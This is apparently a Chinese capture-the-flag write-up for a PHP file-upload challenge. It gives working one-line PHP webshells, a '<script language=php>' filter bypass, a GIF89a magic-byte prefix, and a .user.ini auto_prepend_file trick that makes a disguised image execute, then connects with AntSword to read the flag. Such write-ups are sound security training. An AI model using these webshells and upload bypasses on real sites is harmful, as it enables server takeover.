1.上传一句户木马文件a.php
<?php eval($_POST['zyy']);?><?php eval($_POST['zyy']);?>
爆破其他可支持的 php 文件后缀无果。
2. 上传正常的jpg文件,提示内容不能有<?。本来打算上传图片马,但是有过滤
3.可以改成下面的图片马:
<script language='php'>@eval($_POST['cmd']);</script>
修改后缀为.jpg上传
4.添加文件头后上传
GIF89a<script language='php'>@eval($_POST['zyy']);</script>
上传成功 放入蚁剑 测试连接数据为空 因为没有以php格式运行
5..尝试上传 .htaccess 文件,发现存在检测是否为图片的机制。
通过加入 GIF 文件幻数后成功绕过检测图片的机制,但是这样的话 ".htaccess" 被破坏,无法利用。
6.尝试上传 ".user.ini" 文件
利用 .user.ini 的前提是服务器开启了 CGI 或者 FastCGI,并且上传文件的存储路径下有 index.php 等可执行文件
.user.ini 中有两个配置:auto_prepend_file 和 auto_append_file。这两个配置的意思就是:我们指定一个文件(如 1.jpg),那么该文件就会被包含在要执行的 PHP 文件中(如 index.php),相当于在 index.php 中插入一句:require(./1.jpg);。这两个设置的区别只是在于 auto_prepend_file 是在文件前插入,auto_append_file 在文件最后插入。
上传b.txt文件 内容为
GIF89a
auto_prepend_file=a.jpg
bp抓包修改文件名为.user.ini
放行 上传成功
7.蚁剑连接
这里需要注意一下url格式
网址为http://72677aa1-8445-4c70-bc3f-fe7677825c71.node5.buuoj.cn:81/index.php
页面提示信息为Your dir uploads/17ac2685d5d5a6c401e7f5b28a603095
蚁剑中url地址应为
http://72677aa1-8445-4c70-bc3f-fe7677825c71.node5.buuoj.cn:81/ uploads/17ac2685d5d5a6c401e7f5b28a603095/index.php
连接成功 添加数据 双击打开条目 在根目录下找到了flag
即flag{4c6bf812-9da4-45ba-8ac5-0abfb1a18cbd}